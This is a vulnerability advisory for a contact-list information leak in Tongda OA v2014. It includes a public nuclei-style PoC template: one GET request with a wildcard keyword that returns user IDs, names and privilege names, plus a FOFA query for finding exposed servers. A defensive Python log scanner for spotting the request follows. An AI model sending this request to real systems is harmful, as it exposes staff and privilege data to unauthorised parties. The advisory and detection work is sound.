tongda-contact-list-exposure: Tongda OA v2014 Get Contactlist - Sensitive Information Disclosure

Date: 2025-08-01 | Affected software: Tongda OA | PoC: public

Vulnerability description

The get_contactlist.php file in Tongda OA v2014 has an information leakage vulnerability. Attackers can use it to obtain sensitive information and conduct further attacks.

PoC code [public]

id: tongda-contact-list-exposure

info:
  name: Tongda OA v2014 Get Contactlist - Sensitive Information Disclosure
  author: SleepingBag945
  severity: medium
  description: |
    There is an information leakage vulnerability in the get_contactlist.php file of Tongda OA v2014. Attackers can obtain sensitive information through the vulnerability and conduct further attacks.
  reference:
    - https://github.com/zan8in/afrog/blob/main/v2/pocs/afrog-pocs/vulnerability/tongda-contact-list-disclosure.yaml
  metadata:
    verified: true
    max-request: 1
    fofa-query: app="TDXK-通达OA"
  tags: tongda,oa,exposure,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/mobile/inc/get_contactlist.php?P=1&KWORD=%25&isuser_info=3"

    matchers-condition: and
    matchers:
      - type: word
        words:
          - 'user_uid":'
          - 'user_name":'
          - 'priv_name":'
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100e261f9ab4cc2f1970dbcda1a6697cd40a45e0330d660a1b8475e686586a09d060220589c845b0e229ed2c9c4d341ff7a269b47e85aefec5dfc2f81663b3163305fa5:922c64590222798bb761d5b6d8e72950
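
For defenders, the request the template sends can be looked for in web server access logs. The following is an added example, not part of the original template or the Tongda OA code base; it assumes the Apache/nginx "combined" log format, and the verdict labels and sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

TARGET_PATH = "/mobile/inc/get_contactlist.php"  # path requested by the template

# Assumed log layout: Apache/nginx "combined" format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<uri>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+|-)'
)

# Constructed sample lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Aug/2025:10:00:01 +0800] "GET /mobile/inc/get_contactlist.php?P=1&KWORD=%25&isuser_info=3 HTTP/1.1" 200 18234 "-" "-"',
    '198.51.100.4 - - [01/Aug/2025:10:00:05 +0800] "GET /mobile/inc/get_contactlist.php?P=1&KWORD=%25&isuser_info=3 HTTP/1.1" 403 512 "-" "-"',
    '192.0.2.10 - - [01/Aug/2025:10:01:00 +0800] "GET /general/index.php HTTP/1.1" 200 4096 "-" "-"',
    '192.0.2.11 - - [01/Aug/2025:10:02:00 +0800] "GET /mobile/inc/get_contactlist.php?P=1&KWORD=zhang HTTP/1.1" 200 300 "-" "-"',
]

def classify(line):
    """Return a finding for a request to the contact-list endpoint, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m["uri"])
    # Normalise duplicate slashes and case before comparing the path.
    path = re.sub(r"/{2,}", "/", parts.path).lower()
    if path != TARGET_PATH:
        return None
    query = parse_qs(parts.query, keep_blank_values=True)  # percent-decodes values
    # KWORD=%25 decodes to "%", the match-everything keyword used by the template.
    wildcard = "%" in query.get("KWORD", [""])[0]
    served = m["status"] == "200"
    if served and wildcard:
        verdict = "likely-disclosure"   # full listing was probably returned
    elif served:
        verdict = "review"              # endpoint answered a keyword search
    else:
        verdict = "probe-not-served"    # request seen, but not answered with 200
    size = 0 if m["size"] == "-" else int(m["size"])
    return {"ip": m["ip"], "time": m["time"], "status": int(m["status"]),
            "bytes": size, "wildcard": wildcard, "verdict": verdict}

def scan(lines):
    """Classify every log line and keep only hits on the endpoint."""
    return [f for f in map(classify, lines) if f]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A "likely-disclosure" hit with a large response size is the case to follow up first, since the template's own matchers only require status 200 and the `user_uid`, `user_name` and `priv_name` fields in the body.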
